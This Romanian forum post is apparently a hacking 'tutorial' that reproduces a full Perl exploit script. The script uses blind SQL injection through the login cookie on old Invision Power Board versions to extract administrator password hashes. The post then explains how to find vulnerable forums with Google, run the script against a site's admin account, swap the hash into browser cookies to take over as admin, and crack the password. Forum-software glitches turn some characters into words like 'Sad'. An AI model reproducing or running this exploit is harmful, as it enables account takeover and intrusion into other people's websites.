Jump to content
Proxenon

IPB tutorial

By Proxenon, in Tutoriale in romana

Recommended Posts

Proxenon Newbie

Proxenon

Posted
Posted

Salut acest tutorial se refera la exploitul Ipb adica Invision Powerd Board

Deci sa incepem:

1)Pentru inceput aveti nevoie de Activ Perl

2)Exploitul:#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC

## vulnerable forum versions : 1.* , 2.* (<2.0.4)

## tested on version 1.3 Final and version 2.0.2

## * work on all mysql versions

## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)

## ©oded by 1dt.w0lf

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

## screen:

## ~~~~~~~

## r57ipb2.pl blah.com /ipb13/ 1 0

## [~] SERVER : blah.com

## [~] PATH : /ipb13/

## [~] MEMBER ID : 1

## [~] TARGET : 0 - IPB 1.*

## [~] SEARCHING PASSWORD ... [ DONE ]

##

## MEMBER ID : 1

## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99

##

## r57ipb2.pl blah.com /ipb202/ 1 1

## [~] SERVER : blah.com

## [~] PATH : /ipb202/

## [~] MEMBER ID : 1

## [~] TARGET : 1 - IPB 2.*

## [~] SEARCHING PASSWORD ... [ DONE ]

##

## MEMBER ID : 1

## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

## Greets: James Bercegay of the GulfTech Security Research Team

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru

## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server = $ARGV[0];

$path = $ARGV[1];

$member_id = $ARGV[2];

$target = $ARGV[3];

$pass = ($target)?('member_login_key')Sad'password');

$server =~ s!(http:\/\/)!!;

$request = 'http://';

$request .= $server;

$request .= $path;

$s_num = 1;

$|++;

$n = 0;

print "[~] SERVER : $server\r\n";

print "[~] PATH : $path\r\n";

print "[~] MEMBER ID : $member_id\r\n";

print "[~] TARGET : $target";

print (($target)?(' - IPB 2.*')Sad' - IPB 1.*'));

print "\r\n";

print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)

{

if(&found(47,5Cool==0) { &found(96,122); }

$char = $i;

if ($char=="0")

{

if(length($allchar) > 0){

print qq{\b\b DONE ]

MEMBER ID : $member_id

};

print (($target)?('MEMBER_LOGIN_KEY : ')Sad'PASSWORD : '));

print $allchar."\r\n";

}

else

{

print "\b\b FAILED ]";

}

exit();

}

else

{

$allchar .= chr($i);

}

$s_num++;

}

sub found($$)

{

my $fmin = $_[0];

my $fmax = $_[1];

if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);

$check = " BETWEEN $r AND $fmax";

if ( &check($check) ) { &found($r,$fmax); }

else { &found($fmin,$r); }

}

sub crack($$)

{

my $cmin = $_[0];

my $cmax = $_[1];

$i = $cmin;

while ($i<$cmax)

{

$crcheck = "=$i";

if ( &check($crcheck) ) { return $i; }

$i++;

}

$i = 0;

return $i;

}

sub check($)

{

$n++;

status();

$ccheck = $_[0];

$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";

$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";

$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";

$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

$nmalykh = "%20";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",

$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

while(<$socket>)

{

if (/Set-Cookie: session_id=0;/) { return 1; }

}

return 0;

}

sub status()

{

$status = $n % 5;

if($status==0){ print "\b\b/]"; }

if($status==1){ print "\b\b-]"; }

if($status==2){ print "\b\b\\]"; }

if($status==3){ print "\b\b|]"; }

}

sub usage()

{

print q(

Invision Power Board v < 2.0.4 SQL injection exploit

----------------------------------------------------

USAGE:

~~~~~~

r57ipb2.pl [server] [/folder/] [member_id] [target]

[server] - host where IPB installed

[/folder/] - folder where IPB installed

[member_id] - user id for brute

targets:

0 - IPB 1.*

1 - IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1

----------------------------------------------------

©oded by 1dt.w0lf

RST/GHC , http://rst.void.ru , http://ghc.ru

);

exit();

}

Il salvati cu extensia .pl de ex ipb.pl

3)Mergeti in browser pe google dati search cu urmatoarele powered by invision v1.3

4)Alegeti un forum care vreti

5)Va faceti un cont

6)Start->Run->Cmd

7)Aici puneti numele sitului folderu si numarul userului administratorului si 0 la sfarsit

8)Enter si asteptati...pana o sa va dea un hash

9)Mergeti in opera la tools->preferences->cookies->manage cookies->cautati forumul->si inlocuiti member_id cu numarul acela al adminului->password_hash copiati din cmd acel hash->ok->close

10)Dati un refresh la pagina And Surprise Sunteti Adminul Acelui forum

Atentie pentru a avea acces la Admin Panel trebuie decriptata parola...Un decryptor bun este Cain&Abel dar va trebuie un worldlist bun

Si asta a fost tot

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...